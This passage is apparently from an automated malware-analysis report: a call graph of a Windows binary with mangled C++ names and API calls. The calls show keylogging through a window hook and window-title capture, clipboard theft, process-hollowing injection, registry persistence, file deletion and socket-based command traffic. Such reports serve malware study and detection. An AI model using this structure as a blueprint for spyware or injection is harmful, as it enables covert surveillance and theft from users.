??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4550->4553 4551->4522 4552->4553 4553->4522 4555 408f88 RegQueryValueExA RegCloseKey 4554->4555 4556 408fb0 4554->4556 4555->4556 4556->4527 4558 405249 4557->4558 4559 40523a ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RemoveDirectoryA 4557->4559 4558->4505 4559->4558 4561 40e4bc 4560->4561 4566 40f306 4560->4566 4561->4508 4562 40f332 FindNextFileA 4563 40f40f GetLastError 4562->4563 4562->4566 4564 40f43f FindClose 4563->4564 4563->4566 4564->4561 4565 40f428 FindClose RemoveDirectoryA 4565->4561 4566->4562 4566->4564 4566->4565 4567 40f3ea SetFileAttributesA 4566->4567 4568 40f3fc DeleteFileA 4566->4568 4569 40f3aa RemoveDirectoryA 4566->4569 4567->4568 4568->4564 4568->4566 4569->4566 4580 4011e5 FindWindowA 4570->4580 4572 401227 Sleep 4572->4570 4573 401234 88 API calls 4574 40121b 4573->4574 4574->4572 4574->4573 4581 4011d2 FindWindowA 4575->4581 4577 401209 Sleep 
4577->4575 4578 401234 88 API calls 4579 4011fd 4578->4579 4579->4577 4579->4578 4580->4574 4581->4579 4582->4216 4584 406390 4583->4584 4585 406352 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4583->4585 4586 4063d4 4584->4586 4587 406396 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4584->4587 4588 408fda 7 API calls 4585->4588 4590 4063da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4586->4590 4591 40644c 4586->4591 4589 408fda 7 API calls 4587->4589 4592 406384 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4588->4592 4593 4063c8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4589->4593 4594 408fda 7 API calls 4590->4594 4595 406452 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4591->4595 4596 4064c4 4591->4596 4592->4584 4593->4586 4597 40642e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4594->4597 4598 408fda 7 API calls 4595->4598 4599 406508 4596->4599 4600 4064ca ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ 
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4596->4600 4597->4591 4601 4064a6 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4598->4601 4599->4232 4602 408fda 7 API calls 4600->4602 4601->4596 4603 4064fc ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4602->4603 4603->4599 4605 40f142 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4604->4605 4605->4283 4608 407f70 4607->4608 4609 40f0eb OpenProcess 4607->4609 4608->4291 4608->4298 4609->4608 4611 408ef1 4 API calls 4610->4611 4612 40e5e9 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4611->4612 4633 40eed4 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 4612->4633 4614 40e644 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4614->4265 4615->4285 4616->4289 4618 40d4bd 4617->4618 4628 4080e5 4617->4628 4619 40d4d1 CreateProcessA 4618->4619 4618->4628 4620 40d505 VirtualAlloc GetThreadContext 4619->4620 4619->4628 4621 40d530 ReadProcessMemory 4620->4621 4620->4628 4622 40d552 4621->4622 4623 40d55c VirtualAllocEx 4621->4623 4622->4623 4624 40d57d WriteProcessMemory 4623->4624 4623->4628 4625 40d596 4624->4625 4626 40d5d3 WriteProcessMemory SetThreadContext ResumeThread 
4625->4626 4627 40d59e WriteProcessMemory 4625->4627 4626->4628 4627->4625 4628->4296 4628->4297 4630 409087 4629->4630 4631 40905d RegSetValueExA RegCloseKey 4629->4631 4630->4300 4631->4300 4632->4302 4634 40eef4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4633->4634 4635 40ef2f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4633->4635 4636 40ef3c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4634->4636 4635->4636 4636->4614 4640 403988 4637->4640 4644 4039a2 4640->4644 4641 401289 6 API calls 4642 4039cb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4641->4642 4653 40f4a3 GetForegroundWindow GetWindowTextLengthA 4642->4653 4644->4641 4645 4039e3 Sleep 4644->4645 4646 4039ec 8 API calls 4644->4646 4648 401289 6 API calls 4644->4648 4651 403a85 Sleep 4644->4651 4671 404388 4644->4671 4645->4644 4647 403774 112 API calls 4646->4647 4647->4644 4649 403a6d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4648->4649 4650 40f4a3 43 API calls 4649->4650 4650->4644 4651->4644 4654 40f4c2 7 API calls 4653->4654 4655 40f593 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4653->4655 4675 408667 4654->4675 4657 40f59e 4655->4657 4657->4644 4659 40efb5 20 API calls 4666 40f540 4659->4666 4660 40f582 4661 401b3c 2 API calls 4660->4661 4663 40f58a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4661->4663 4662 401289 6 API calls 4664 40f55e ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I 4662->4664 4663->4655 4665 40f5a2 4664->4665 4664->4666 4667 40f5d1 4665->4667 
4668 40f5a8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4665->4668 4666->4660 4666->4662 4669 401b3c 2 API calls 4667->4669 4668->4667 4670 40f5d9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4669->4670 4670->4657 4672 404393 4671->4672 4673 4043b6 4671->4673 4672->4673 4674 4043a1 UnhookWindowsHookEx TerminateThread 4672->4674 4673->4644 4674->4673 4676 40866e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4675->4676 4676->4659 4678 403762 CreateThread 4677->4678 4678->4312 4678->4313 4679 40382c 4678->4679 4688 403ae3 4679->4688 4727 404077 4682->4727 4765 403877 4685->4765 4689 403af7 Sleep ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4688->4689 4690 403b18 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ GetFileAttributesA 4689->4690 4691 403d89 4689->4691 4693 403b42 4690->4693 4694 403b2e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ SetFileAttributesA 4690->4694 4691->4689 4692 403837 4691->4692 4695 401289 6 API calls 4693->4695 4694->4693 4696 403b4e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4695->4696 4697 403bb0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4696->4697 4698 403b5b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4696->4698 4721 4028eb 4697->4721 4699 403b84 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ 
?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4698->4699 4700 403b9f ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4698->4700 4699->4700 4702 403d52 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4700->4702 4704 401289 6 API calls 4702->4704 4703 403be1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4723 40f44c ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH 4703->4723 4706 403d6b ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4704->4706 4706->4691 4708 403d78 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ SetFileAttributesA 4706->4708 4707 403bef 4709 403ca1 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4707->4709 4710 403bf8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4707->4710 4708->4691 4711 402a2a 4 API calls 4709->4711 4712 403c21 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2 4710->4712 4713 403c95 ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4710->4713 4714 403cd4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4711->4714 4726 405288 4712->4726 4713->4709 4716 403d29 free ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4714->4716 4717 403cfd ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH 
?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@ 4714->4717 4716->4702 4717->4716 4718 403c3b malloc ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@ ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4719 402a2a 4 API calls 4718->4719 4720 403c82 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4719->4720 4720->4713 4722 4028fc 4721->4722 4722->4703 4724 40f472 ??Bios_base@std@ ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4723->4724 4724->4707 4726->4718 4739 404089 4727->4739 4728 4040a5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4731 40fcba 2 API calls 4728->4731 4729 4040c6 Sleep GetForegroundWindow GetWindowTextLengthA ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@ 4732 4040f9 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ GetWindowTextA ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 4729->4732 4729->4739 4730 403846 4731->4739 4733 404129 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4732->4733 4732->4739 4745 403a9a 4733->4745 4736 404181 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4736->4739 4737 40e898 GetLastInputInfo GetTickCount 4737->4739 4738 404236 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4738->4739 4739->4728 4739->4729 4739->4730 4739->4737 4739->4738 4740 
404244 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4739->4740 4741 4041c1 Sleep 4739->4741 4742 4041cd _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4739->4742 4750 405142 4739->4750 4740->4730 4741->4739 4743 403a9a 4 API calls 4742->4743 4744 404224 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4743->4744 4744->4738 4746 403ab3 4745->4746 4747 403aa6 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4745->4747 4748 403ab9 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ SetEvent 4746->4748 4749 403acf ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4746->4749 4747->4746 4748->4749 4749->4736 4751 405178 4750->4751 4752 40515b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4750->4752 4761 4050fc OpenClipboard 4751->4761 4753 40fcba 2 API calls 4752->4753 4753->4751 4755 405184 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 4756 4051f3 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4755->4756 4757 40519a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4755->4757 4756->4739 4757->4756 4758 4051bb ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD 4757->4758 4759 403a9a 4 API calls 4758->4759 4760 4051ea ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4759->4760 4760->4756 4762 405121 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4761->4762 4763 40510d GetClipboardData CloseClipboard 4761->4763 4762->4755 4763->4762 4766 4038a5 4765->4766 4767 40388d GetModuleHandleA SetWindowsHookExA 4765->4767 4768 4038b2 GetMessageA 4766->4768 4767->4766 4769 403817 4768->4769 4770 4038b8 TranslateMessage DispatchMessageA 4768->4770 4770->4768 4777 405e9f 4771->4777 4778 405ef9 Sleep 4777->4778 4779 405f19 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4777->4779 4785 405d53 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4777->4785 4800 405afb 12 API calls 4777->4800 4817 4057b6 13 API calls 4777->4817 4838 4056ec 6 API calls 4777->4838 4850 405622 6 API calls 4777->4850 4778->4777 4780 403a9a 4 API calls 4779->4780 4781 405f38 4780->4781 4782 405f5d 4781->4782 4783 405f40 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4781->4783 4784 409046 3 API calls 4783->4784 4784->4782 4786 408ef1 4 API calls 4785->4786 4787 405d84 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4786->4787 4788 405dc1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ExpandEnvironmentStringsA PathFileExistsA 4787->4788 4794 405daf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4787->4794 4789 405df9 4788->4789 4788->4794 4791 40f234 9 API calls 4789->4791 4792 405e05 4791->4792 4792->4794 4795 405e2e ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 4792->4795 4793 403a9a 4 API calls 4796 405e2a 4793->4796 4794->4793 4797 405e64 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4795->4797 4798 405e42 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4795->4798 4796->4797 4797->4777 4799 403a9a 4 API calls 4798->4799 4799->4797 4801 405bc2 FindNextFileA 4800->4801 4802 405ba5 FindClose 4800->4802 4812 405bd4 4801->4812 4803 405ceb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4802->4803 4805 403a9a 4 API calls 4803->4805 4804 405d13 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4808 403a9a 4 API calls 4804->4808 4807 405cfb 4805->4807 4806 405cbc FindNextFileA 4806->4812 4809 405cfd ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4807->4809 4810 405d32 FindClose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4808->4810 4811 405d4f 4809->4811 4810->4811 4811->4777 4812->4804 4812->4806 4813 405c59 7 API calls 4812->4813 4814 405cb2 GetLastError 4813->4814 4815 405cdc 4813->4815 4814->4806 4816 405cd1 FindClose 4814->4816 4815->4803 4816->4809 4818 40589d FindNextFileA 4817->4818 4819 40586e FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4817->4819 4821 405a58 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4818->4821 4828 4058b7 4818->4828 4820 403a9a 4 API calls 4819->4820 4822 405896 4820->4822 4823 403a9a 4 API calls 4821->4823 4824 405adc ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4822->4824 4825 405a77 FindClose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4823->4825 4827 405a9d 4824->4827 4825->4827 4826 405a40 FindNextFileA 4826->4821 4826->4828 4827->4777 4828->4826 4829 40593b 10 API calls 4828->4829 4832 4059fe ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ DeleteFileA 4828->4832 4836 405ab2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4828->4836 4829->4828 4830 4059cd ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ DeleteFileA 4829->4830 4830->4828 4831 4059e1 GetLastError 4830->4831 4831->4828 4833 405aa2 FindClose 4831->4833 4832->4828 4834 405a12 GetLastError 4832->4834 4833->4824 4834->4828 4834->4833 4837 403a9a 4 API calls 4836->4837 4837->4833 4839 405786 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4838->4839 4840 40573c GetLastError 4838->4840 4843 403a9a 4 API calls 4839->4843 4841 405746 4840->4841 4842 40574d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4840->4842 4841->4842 4844 405749 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4841->4844 4847 403a9a 4 API calls 4842->4847 4843->4844 4849 4057b3 4844->4849 4848 40576d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4847->4848 4848->4849 4849->4777 4851 405672 GetLastError 4850->4851 4852 4056bc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4850->4852 4854 40567c 4851->4854 4857 405683 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4851->4857 4853 403a9a 4 API calls 4852->4853 4856 40567f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4853->4856 4854->4856 4854->4857 4860 4056e9 4856->4860 4859 403a9a 4 API calls 4857->4859 4861 4056a3 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4859->4861 4860->4777 4861->4860 4863 402115 
4862->4863 4864 40211a socket 4862->4864 4893 402141 WSAStartup 4863->4893 4865 40212c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4864->4865 4865->4337 4868 40218d WSAGetLastError 4867->4868 4869 402189 4867->4869 4868->4869 4869->4350 4870->4366 4871->4366 4872->4366 4873->4366 4874->4366 4894 402504 7 API calls 4875->4894 4877 4021b2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4877->4370 4879 402245 malloc recv 4878->4879 4880 402264 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4879->4880 4881 4022ad free 4879->4881 4880->4881 4882 40229c 4880->4882 4881->4879 4884 4022b9 4881->4884 4900 4022ea ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4882->4900 4885 4022cd ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4884->4885 4919 402791 4884->4919 4885->4372 4888 40437e 4887->4888 4889 404342 TerminateThread 4887->4889 4888->4372 4889->4888 4890 404353 CloseHandle 4889->4890 4890->4888 4891 404367 4890->4891 4891->4888 4892 40436d UnhookWindowsHookEx TerminateThread 4891->4892 4892->4888 4893->4864 4895 40256b ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ send 4894->4895 4896 40258d ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4894->4896 4897 4025d8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4895->4897 4898 402a2a 4 API calls 
4896->4898 4897->4877 4899 4025af ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ send ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4898->4899 4899->4897 4901 40230a ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4900->4901 4902 402320 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4901->4902 4903 402357 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4901->4903 4904 402a2a 4 API calls 4902->4904 4905 402363 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4903->4905 4906 402342 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4904->4906 4923 4024b4 strncmp 4905->4923 4906->4905 4909 4024a4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4909->4881 4910 402385 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4911 402496 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4910->4911 4912 40239c ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4910->4912 4911->4909 4913 4023b2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4912->4913 4914 4023be 6 API calls 4912->4914 4913->4914 4915 402410 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4914->4915 4916 402428 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ CreateEventA CreateThread WaitForSingleObject 4914->4916 4918 402423 4915->4918 4917 40245c ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 